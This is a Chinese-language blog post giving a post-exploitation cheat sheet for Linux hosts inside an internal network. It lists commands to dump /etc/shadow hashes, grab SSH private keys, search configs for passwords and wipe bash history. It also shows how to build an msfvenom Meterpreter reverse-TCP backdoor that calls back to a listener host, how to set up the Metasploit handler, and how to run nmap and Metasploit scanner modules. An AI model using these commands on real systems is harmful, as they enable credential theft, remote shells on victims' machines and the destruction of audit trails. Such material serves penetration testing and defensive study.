Linux 内网本机信息收集 速查 checklist

最新推荐文章于 2024-03-27 16:24:23 发布
最新推荐文章于 2024-03-27 16:24:23 发布
阅读量834 收藏 3
点赞数 1
分类专栏: 内网安全研究 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_zzZ/article/details/106921992
版权

Linux 内网本机信息收集速查

系统类型
cat /etc/issue
查看系统名称
网络信息收集
last                                    多数运维会接入内网登录系统,这时候,便可获取部分内网ip 进而对内网IP段进行画像
Route -n                                内网路由情况,也能为内网网络拓扑提供一定的信息
IPtables                                防火墙情况,有时候会存在内网网络通行规则,也能提供一定信息

历史命令!
/root/.bash_history
直接命令搜敏感文件收集
grep "password:" * -Rn
find / -name "config.*"
find / -name "databases.*"
find / -name "config.*" | xargs grep "password""
常用敏感文件
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_ras.keystore
/root/.ssh/known_hosts //记录每个访问计算机用户的公钥
/etc/passwd
/etc/shadow
/etc/my.cnf //mysql配置文件
/etc/httpd/conf/httpd.conf //apache配置文件
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql历史命令记录文件
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/var/lib/mlocate/mlocate.db //全文件路径
/porc/self/cmdline //当前进程的cmdline参数
内核版本
uname –a 查看所有信息
用户
whoami
id
cat /etc/passwd #查看用户列表
cat /etc/shadow #获取用户hash
进程
ps aux 查看进程信息
网卡
/etc/network/interfaces #网卡信息
ifconfig
route #查看路由
arp -a #查看缓存的地址解析情况
服务信息
cat /etc/serivice #查看存在的服务
cat /etc/serices | grep ** #查看对应服务
服务配置
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
日志信息
/var/log
/var/log/apache2/access.log #http日志
/var/log/mysql/error.log #mysql日志
/var/log/apt/history.log #apt日志
历史命令
 ~/.bash_history
echo > .bash_history #上述文件类日志删除
history #命令操作历史
history -c #删除
软件信息
dpkg -l #查看安装的软件包
rpm -qa #查看安装的软件包

关键信息收集

历史命令!

/root/.bash_history

本地保存的ssh密钥

/root/.ssh/id_rsa

LINUX后门生成

1.示例指令:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell

2.配置Metasploitexploit监听

search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

nmap扫描:

nmap ‐sP ‐PI 192.168.1.0/24 ‐T4

端口扫描

auxiliary/scanner/portscan
scanner/portscan/ack ACK防火墙扫描
scanner/portscan/ftpbounce FTP跳端口扫描
scanner/portscan/syn SYN端口扫描
scanner/portscan/tcp TCP端口扫描
scanner/portscan/xmas TCP"XMas"端口扫描

SMB扫描

scanner下模块,辅助发现内网存活主机,分别为:

  • auxiliary/scanner/discovery/arp_sweep

  • auxiliary/scanner/discovery/udp_sweep

  • auxiliary/scanner/ftp/ftp_version

  • auxiliary/scanner/http/http_version

  • auxiliary/scanner/smb/smb_version

  • auxiliary/scanner/ssh/ssh_version

  • auxiliary/scanner/telnet/telnet_version

  • auxiliary/scanner/discovery/udp_probe

  • auxiliary/scanner/dns/dns_amp

  • auxiliary/scanner/mysql/mysql_version

  • auxiliary/scanner/netbios/nbname

  • auxiliary/scanner/http/title

  • auxiliary/scanner/db2/db2_version

  • auxiliary/scanner/portscan/ack

  • auxiliary/scanner/portscan/tcp

god_Zeo
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Linux内网信息收集
weixin_59114667的博客
03-16 282
Linux内网信息收集
Linux内网信息收集
qq_44806973的博客
01-05 1052
这里写目录标题查看系统名称查看主机名查看内核信息显示真实有效的用户和组信息当前用户查看当前组当前登录信息找带suid的文件查看当前用户执行哪些 sudo 命令无需密码当前用户可用的所有命令密码信息 查看系统名称 cat /etc/issue 查看主机名 hostname uname -a 查看内核信息 uname -mrs rpm -q kernel dmesg |grep Linux ls /boot | grep vmlinuz- 明白了系统的版本或发行版,下一步就针对这个搜索有关的
内网渗透之Linux主机信息收集
Websec
03-15 340
内网安全】——Linux信息收集
热门推荐
Demo不是emo的博客
12-01 1万+
我们在获取到webshell之后,经常会遇到Linux的操作系统,这是我们需要对Linux系统本地的敏感资源进行信息收集,下面就是一些有用的信息获取方式。
内网渗透----Linux信息收集整理
浅笑996的博客
12-04 1860
一、基础信息收集 1.查看系统类型 cat /etc/issue cat /etc/*-release cat /etc/lsb-release cat /etc/redhat-release 2.内核版本 cat /proc version uname -a uname -mrs rpm -q kernel dmesg |grep Linux ls /root |grep vmlin...
Checklist Linux-开源
05-03
该工具的目标是对系统Unix进行审核。 为了执行此过程,此工具对操作系统的配置和变量进行了验证。
php-security-checklist:OWSAP速查表已废弃
05-28
该作品。 它是根据。 基本的 ... 确保已禁用 ,因为这样可以将任意变量注入脚本的环境(!)。... 它对安全性没有影响,但是使人们认为它实际上可以帮助保护应用程序免受SQL注入,因此人们依靠它进行转义(非常错误!...
linux-checklist, 在设置了新的Linux发行版之后,应该安装什么.zip
09-18
linux-checklist, 在设置了新的Linux发行版之后,应该安装什么 全新的Linux安装这是一组清单,当你为个人用户安装新的Linux安装时,不确定安装了什么。 请随意复制。修改和重新发布。PS: 这是第一个版本,正在测试。...
投标标书全流程checklist
03-31
标书全流程checklist 启动投标 制作标书 标书封装
芯片Design_Review_Checklist
11-24
在信息技术领域,芯片设计是一项至关重要的任务,它涉及到复杂的电子系统的核心部分。本文将详细探讨芯片设计的三个关键阶段——设计启动、RTL代码发布和胶片输出,并提供相应的检查清单,以确保每个阶段的顺利进行...
inlinux:内网渗透信息收集脚本
05-09
inlinux 内网渗透信息收集脚本
3.Linux常用命令与内网信息收集命令
weixin_42974824的博客
04-22 2023
Linux常用命令与内网信息收集命令
内网渗透_信息搜集(Linux)
qq_42383069的博客
04-21 5539
Linux 信息搜集 Linux信息搜集脚本: 1、地址: https://github.com/rebootuser/LinEnum 2、用法: 上传到 /tmp目录下,然后赋予权限运行即可 手工收集 1、查看端口状态(服务、内网IP连接等) netstat -anpt 2、查看进程状态 ps -ef 或者 ps -aux top 3、查看文件(获取密码、网站目录、资产信息等) 1)查看历史命令:cat /root/.bash_history 2)查看passwd文件:cat /etc/pas
linux内网信息收集常用命令
buffedon的博客
07-09 432
linux信息收集常用命令 系统信息 cat /etc/issue #查看系统名称 cat /etc/Lsb-release #查看系统名称,版本号 cat /etc/*release #查看linux发行信息 uname -an #查看内核版本 cat /proc/version #查看内核信息 cat /proc/cpuinfo #查看cpu信息 #查看文件系统 df -a #查看系统日志 sudo cat /var/l
内网信息收集Linux& Windows WMI
qq_45434762的博客
03-03 658
Linux查看当前用户权限whoami 查看网卡配置ipconfig ip address ip a 查看端口状态查看端口监听状态,以及链接状态netstat -anpt 查看进程状态p...
内网渗透之信息搜集:Linux信息搜集
balalawb的博客
11-01 95
Linux信息搜集
内网渗透----Linux信息收集
浅笑996的博客
12-04 4530
1.系统类型 cat /etc/issue查看系统名称 Lsb-release查看系统名称、版本号 2. 内核版本 uname –a 查看所有信息 ls /root |grep vmlinuz 3. 进程 ps aux 查看进程信息 ps –ef查看进程信息 4. 安装的软件包 使用dpkg –l查看安装的软件包 5. 服务配置 查看apache配置文件 6. 网络...
Linux内网渗透-信息收集命令基础篇
最新发布
qq_51845659的博客
03-27 1124
针对linux系统的信息收集命令超全合集,命令执行结果附图!!!
内网信息收集
嘻嘻哈哈
06-21 975
1、信息收集 a. 获取当前组的计算机名 net view b. 查看所有域 net view /domain c. 从计算机名获取ipv4地址 ping -n 1 计算机名 -4 ps:如果计算机名很多时,可以利用bat批量ping获取ip bat: @echo off setlocal ENABLEDELAYEDEXPANSION @FOR /F "useb...
机构设计与生产专业英语词汇速查
15. **Barcode scanner** - 条码扫描器:读取条形码信息的设备。 16. **Fuse together** - 熔合:通过加热使两个或更多部件融合成一体。 17. **Fuse machine** - 热熔机:用于熔接塑料或其他材料的机器。 18. **...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值